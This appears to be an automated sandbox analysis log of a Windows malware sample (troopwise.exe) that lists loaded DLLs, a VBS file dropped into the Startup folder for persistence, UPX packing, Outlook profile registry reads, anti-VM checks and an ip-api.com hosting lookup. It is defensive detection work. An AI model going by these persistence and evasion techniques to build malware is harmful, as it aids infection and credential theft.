                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                    Source: Binary string: wntdll.pdbUGP source: troopwise.exe, 00000001.00000003.1762100016.0000000003700000.00000004.00001000.00020000.00000000.sdmp, troopwise.exe, 00000001.00000003.1751043966.0000000003850000.00000004.00001000.00020000.00000000.sdmp, troopwise.exe, 00000004.00000003.1885559677.0000000004060000.00000004.00001000.00020000.00000000.sdmp, troopwise.exe, 00000004.00000003.1884597088.0000000004200000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: troopwise.exe, 00000001.00000003.1762100016.0000000003700000.00000004.00001000.00020000.00000000.sdmp, troopwise.exe, 00000001.00000003.1751043966.0000000003850000.00000004.00001000.00020000.00000000.sdmp, troopwise.exe, 00000004.00000003.1885559677.0000000004060000.00000004.00001000.00020000.00000000.sdmp, troopwise.exe, 00000004.00000003.1884597088.0000000004200000.00000004.00001000.00020000.00000000.sdmp
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00F98070 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,0_2_00F98070
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EE8719 push FFFFFF8Bh; iretd 0_2_00EE871B
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EAE94F push edi; ret 0_2_00EAE951
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EAEA68 push esi; ret 0_2_00EAEA6A
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EA8B85 push ecx; ret 0_2_00EA8B98
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EAEC43 push esi; ret 0_2_00EAEC45
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EAED2C push edi; ret 0_2_00EAED2E
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005B8719 push FFFFFF8Bh; iretd 1_2_005B871B
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_0057E94F push edi; ret 1_2_0057E951
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_0057EA68 push esi; ret 1_2_0057EA6A
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_00578B85 push ecx; ret 1_2_00578B98
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_0057EC43 push esi; ret 1_2_0057EC45
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_0057ED2C push edi; ret 1_2_0057ED2E
                    Source: initial sampleStatic PE information: section name: UPX0
                    Source: initial sampleStatic PE information: section name: UPX1
                    Source: initial sampleStatic PE information: section name: UPX0
                    Source: initial sampleStatic PE information: section name: UPX1
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeFile created: C:\Users\user\AppData\Local\seskin\troopwise.exeJump to dropped file

                    Boot Survival

                    barindex
                    Drops VBS files to the startup folder
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\troopwise.vbsJump to dropped file
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\troopwise.vbsJump to behavior
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\troopwise.vbsJump to behavior
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00E84A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00E84A35
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00F055FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00F055FD
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_00554A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,1_2_00554A35
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005D55FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,1_2_005D55FD
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EA33C7 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00EA33C7
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: troopwise.exe PID: 7128, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: troopwise.exe PID: 4048, type: MEMORYSTR
                    Check if machine is in data center or colocation facility
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
